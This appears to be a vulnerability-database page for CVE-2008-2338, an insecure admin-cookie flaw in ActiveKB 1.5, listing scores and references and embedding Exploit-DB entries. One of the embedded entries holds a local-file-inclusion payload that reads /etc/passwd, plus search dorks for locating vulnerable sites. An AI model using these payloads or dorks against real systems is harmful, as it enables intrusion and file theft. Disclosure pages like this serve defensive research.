CVE-2008-2338
published 2008-05-19CVE-2008-2338: Interspire ActiveKB 1.5 and earlier allows remote attackers to gain privileges by setting the auth cookie to true when accessing unspecified scripts in /admin.
PriorityP350high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
6.36%
92.8th percentile
Interspire ActiveKB 1.5 and earlier allows remote attackers to gain privileges by setting the auth cookie to true when accessing unspecified scripts in /admin.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| interspire | activekb | <= 1.5 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
FreeWebShop.org 2.2.9 RC2 - 'lang_file' Local File Inclusion
exploitdb·2009-04-15
CVE-2009-2338 FreeWebShop.org 2.2.9 RC2 - 'lang_file' Local File Inclusion
FreeWebShop.org 2.2.9 RC2 - 'lang_file' Local File Inclusion
---
=-=-local file include-=-=
script::FreeWebshop.org 2..2.9_R2
Author: ahmadbady
download from:http://chaozz.deepunder.dk/released/freewebshop/FreeWebshop.org2.2.9_R2.zip
vul: /includes/startmodules.inc.php line 31;
include ("./".$lang_file);
xpl:
/path/includes/startmodules.inc.php?lang_file=.../../../../etc/passwd
dork:
"FreeWebshop.org | This is the Footer | ©2008-2009"
"FreeWebshop.org | This is the Footer |"
# milw0rm.com [2009-04-15]
Exploit-DB
ActiveKB 1.5 - Insecure Cookie Handling/Arbitrary Admin Access
exploitdb·2008-05-14
CVE-2008-2338 ActiveKB 1.5 - Insecure Cookie Handling/Arbitrary Admin Access
ActiveKB 1.5 - Insecure Cookie Handling/Arbitrary Admin Access
---
--==+================================================================================+==--
--==+ ActiveKB <= 1.5 Insecure Cookie Handling/Arbitrary Admin Access +==--
--==+================================================================================+==--
Discovered By: t0pP8uZz
Discovered On: 14 MAY 2008
Script Download: N/A
DORK (alot more sites, people remove dork): " ActiveKB v1.5 Copyright ©"
Vendor Has Not Been Notified!
DESCRIPTION:
ActiveKB suffers from an insecure cookie, when the admin details are checked the script creates a cookie,
to let the script know in future the user is already been checked and is admin. The thing is that, the cookie
only contains a "true" value. So this allows the remote attac
No writeups or analysis indexed.
http://secunia.com/advisories/30265http://www.securityfocus.com/bid/29226http://www.securitytracker.com/id?1020035https://exchange.xforce.ibmcloud.com/vulnerabilities/42427https://www.exploit-db.com/exploits/5616http://secunia.com/advisories/30265http://www.securityfocus.com/bid/29226http://www.securitytracker.com/id?1020035https://exchange.xforce.ibmcloud.com/vulnerabilities/42427https://www.exploit-db.com/exploits/5616
2008-05-19
Published